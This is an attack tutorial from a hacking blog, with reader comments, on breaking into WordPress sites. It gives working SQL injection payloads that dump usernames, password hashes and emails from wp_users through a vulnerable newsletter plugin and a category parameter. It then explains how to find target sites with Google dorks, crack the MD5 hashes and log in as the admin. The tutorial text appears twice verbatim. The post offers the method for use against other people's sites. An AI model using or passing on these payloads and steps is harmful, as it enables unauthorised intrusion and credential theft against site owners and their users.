wordpress SQL Injection Hacks : Another Special Post :-)
there are Million of sites which hosted on wordpress. and i already posted Some Tutorials on wordpress Hacking You Can Check it here , so Its new Tutorial on wordpress
hacking with SQL injections, lets see
Cilck here to heck List of wordpress SQL Injections
How To use it ?
For Example 1st injection is "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/* Now Modify it into a Google Dork, For making Dork use "Inurl:injection's php or dire here" for example for this injection dork will be "inurl:wp-content/plugins/st_newsletter/stnl_iframe.php" Now Go to Google.com and type your modified dork and see the serach result the search result will be like this for dork http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter= Reomve the words after iframe.php and put ur SQl injection here ... now the url will be http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--You will got the use name and md5 coded password ... Crash the password using md5 decoding Tools and login here http://site.com/wp-login.php
Note : The Process is same for all Injections is same ... cooment below if any dobught ..
hacking with SQL injections, lets see
Cilck here to heck List of wordpress SQL Injections
How To use it ?
For Example 1st injection is "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/* Now Modify it into a Google Dork, For making Dork use "Inurl:injection's php or dire here" for example for this injection dork will be "inurl:wp-content/plugins/st_newsletter/stnl_iframe.php" Now Go to Google.com and type your modified dork and see the serach result the search result will be like this for dork http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter= Reomve the words after iframe.php and put ur SQl injection here ... now the url will be http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--You will got the use name and md5 coded password ... Crash the password using md5 decoding Tools and login here http://site.com/wp-login.php
Note : The Process is same for all Injections is same ... cooment below if any dobught ..
105 comments:
Great post -
Its blind sql injections ? Can we do it with havij ?
Hi buddy..ur blog is awesome..very informative...
In this tut i tried many sites..bt mostly i am getting errors or the page goes blank..m just a newbie..this que mi8 be stupid bt please guide..
where i find md5 cracker plz give me link
wonderful information, I had come to know about your blog from my friend nandu , hyderabad,i have read atleast 7 posts of yours by now, and let me tell you, your website gives the best and the most interesting information. This is just the kind of information that i had been looking for, i\'m already your rss reader now and i would regularly watch out for the new posts, once again hats off to you! Thanks a ton once again, Regards, atozlatestsongs free download
regards
alekhya
http://atozlatestmp3.com/endukante-premanta-ram2012telugu-songs-free-download/
Nice Post devilscafe.in :)
visit back : http://ariqnz.blogspot.com
Post a Comment
If you're having issues, Please leave an email address I can contact you on -
I advise you to also "subscribe to the comment feed" and get email updates when I respond to your question.
Hyperlinks are not allowed, Spam/advertising comments will NEVER BE TOLERATED and will be deleted immediately!
Thanks for reading,
Admin